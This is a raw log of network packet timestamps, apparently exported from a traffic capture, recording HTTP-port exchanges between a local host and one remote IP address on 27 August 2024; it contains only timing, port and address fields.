                                Aug 27, 2024 09:49:39.499083996 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.499094963 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.499104023 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.499104023 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.499114037 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.499121904 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.499124050 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.499146938 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.499186993 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.499376059 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.499385118 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.499399900 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.499408960 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.499418974 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.499429941 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.499439955 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.499444008 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.499450922 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.499461889 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.499463081 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.499471903 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.499483109 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.499490023 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.499492884 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.499502897 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.499509096 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.499512911 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.499524117 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.499527931 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.499532938 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.499543905 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.499552965 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.499564886 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.499576092 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.499583006 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.499586105 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.499597073 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.499607086 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.499613047 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.499706984 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.499867916 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.499883890 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.499901056 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.499912024 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.499912977 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.499922037 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.499932051 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.499939919 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.499942064 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.499953032 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.499963045 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.499975920 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.499979019 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.499985933 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.499990940 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.499995947 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.500009060 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.500015974 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.500019073 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.500031948 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.500056982 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.500080109 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.500113010 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.500123024 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.500133038 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.500143051 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.500153065 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.500161886 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.500164986 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.500206947 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.500298977 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.500308037 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.500318050 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.500328064 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.500338078 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.500349045 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.500360966 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.500360966 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.500400066 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.554893017 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.584655046 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.584669113 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.584682941 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.584703922 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.584714890 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.584721088 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.584727049 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.584738016 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.584755898 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.584790945 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.584801912 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.584819078 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.584830046 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.584830999 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.584840059 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.584850073 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.584852934 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.584863901 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.584907055 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.584990978 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.585009098 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.585020065 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.585031033 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.585042000 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.585045099 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.585053921 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.585067987 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.585110903 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.585135937 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.585146904 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.585158110 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.585169077 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.585180998 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.585191965 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.585205078 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.585216045 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.585293055 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.585304976 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.585319042 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.585330963 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.585341930 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.585433960 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.585445881 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.585455894 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.585469007 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.585479021 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.585484028 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.585489035 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.585500002 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.585510969 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.585521936 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.585532904 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.585545063 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.585597038 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.585611105 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.585645914 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.585716963 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.585728884 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.585738897 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.585752964 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.585764885 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.585774899 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.585777998 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.585791111 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.585798979 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.585818052 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.585870028 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.585880995 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.585891962 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.585902929 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.585910082 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.585922003 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.585933924 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.585936069 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.585944891 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.585957050 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.585958004 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.585968018 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.585979939 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.585985899 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.585989952 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.586000919 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.586008072 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.586014986 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.586025000 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.586025953 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.586038113 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.586076975 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.586255074 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.586267948 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.586281061 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.586297989 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.586309910 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.586323023 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.586335897 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.586349010 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.586361885 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.586373091 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.586393118 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.586405039 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.586416960 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.586429119 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.586441040 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.586452007 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.586464882 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.586473942 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.586486101 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.586498022 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.586507082 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.586519003 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.586530924 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.586543083 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.586560011 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.586719990 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.586730957 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.586842060 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.586853027 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.586863041 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.586874962 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.586888075 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.586899042 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.586910963 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.586920977 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.586932898 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.586996078 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.587007999 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.587018967 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.587037086 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.587063074 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.587073088 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.587085962 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.587097883 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.587110996 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.587122917 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.587135077 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.587304115 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.587316990 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.587328911 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.587340117 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.587354898 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.587366104 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.587382078 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.587390900 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.587433100 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.587474108 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.673845053 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.673870087 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.673882008 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.673979044 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.674000978 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.674011946 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.674022913 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.674034119 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.674046040 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.674053907 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.674057007 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.674076080 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.674093962 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.674138069 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.674149036 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.674160004 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.674171925 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.674181938 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.674182892 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.674195051 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.674196959 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.674207926 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.674220085 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.674221992 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.674232006 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.674247980 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.674269915 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.674490929 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.674509048 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.674519062 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.674529076 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.674540043 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.674550056 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.674551010 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.674562931 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.674565077 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.674571991 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.674583912 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.674585104 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.674603939 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.674614906 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.674626112 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.674631119 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.674637079 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.674647093 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.674650908 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.674660921 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.674669027 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.674671888 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.674683094 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.674689054 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.674695015 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.674706936 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.674706936 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.674716949 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.674729109 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.674730062 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.674740076 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.674751043 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.674767017 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.674791098 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.675477982 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.675489902 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.675498962 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.675509930 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.675518990 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.675520897 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.675532103 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.675546885 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.675550938 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.675556898 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.675568104 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.675571918 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.675579071 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.675589085 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.675590992 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.675602913 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.675606012 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.675615072 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.675625086 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.675631046 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.675642967 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.675653934 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.675656080 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.675664902 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.675682068 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.675689936 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.675693035 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.675704956 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.675709963 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.675717115 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.675729990 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.675739050 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.675740957 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.675751925 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.675760984 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.675762892 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.675772905 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.675780058 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.675785065 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.675796986 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.675800085 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.675807953 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.675818920 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.675825119 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.675831079 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.675842047 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.675842047 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.675854921 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.675865889 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.675865889 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.675884008 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.675894976 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.675901890 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.675905943 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.675918102 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.675926924 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.675929070 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.675951004 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.675972939 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.677615881 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.677628040 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.677637100 CEST8049715188.114.96.3192.168.2.8
